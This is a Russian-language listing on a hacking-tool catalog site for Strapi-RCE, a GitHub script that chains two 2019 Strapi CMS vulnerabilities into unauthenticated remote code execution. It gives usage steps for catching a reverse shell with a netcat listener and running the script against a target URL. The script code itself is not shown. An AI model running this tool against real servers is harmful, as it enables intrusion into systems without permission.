Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Strapi-RCE — Эксплойт-скрипт, демонстрирующий комбинацию CVE-2019-18818 и CVE-2019-19609 для неаутентифицированного удаленного выполнения кода в Strapi CMS. | Kitploit
Инструменты/GitHubGitHub/hackhoven/strapi-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubhackhoven/strapi-rce

Strapi-RCE

Эксплойт-скрипт, демонстрирующий комбинацию CVE-2019-18818 и CVE-2019-19609 для неаутентифицированного удаленного выполнения кода в Strapi CMS.

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Strapi-RCE

Эксплойт-скрипт, демонстрирующий комбинацию CVE-2019-18818 и CVE-2019-19609 для неавторизованного удаленного выполнения кода в Strapi CMS.

Эксплойт

Этот скрипт эксплуатирует уязвимость в Strapi CMS версий 3.0.0-beta.17.4 и ниже, позволяющую неавторизованное удаленное выполнение кода.

Описание

Эксплойт работает следующим образом: сначала используется уязвимость сброса пароля для получения JSON Web Token (JWT) для административного пользователя. Затем этот токен используется для отправки вредоносной нагрузки в Strapi CMS, которая запускает обратную оболочку на машину атакующего.

Как использовать

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/Hackhoven/Strapi-RCE.git
    
  2. Перейдите в директорию

    root@kitploit:~
    cd Strapi-RCE/
    
  3. Настройте прослушиватель Netcat

    root@kitploit:~
    nc -nlvp <LPORT>
    
  4. Запустите скрипт, передав целевой URL, IP-адрес локального хоста и порт локального хоста в качестве аргументов

    root@kitploit:~
    python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
    

Отказ от ответственности

Этот скрипт предназначен только для образовательных целей. Автор не одобряет и не поддерживает использование этого скрипта для незаконных или неэтичных действий. Этот скрипт следует использовать только в легальных исследованиях безопасности или в средах CTF. Используйте на свой страх и риск.


Сделано Hackhoven

Скачать инструмент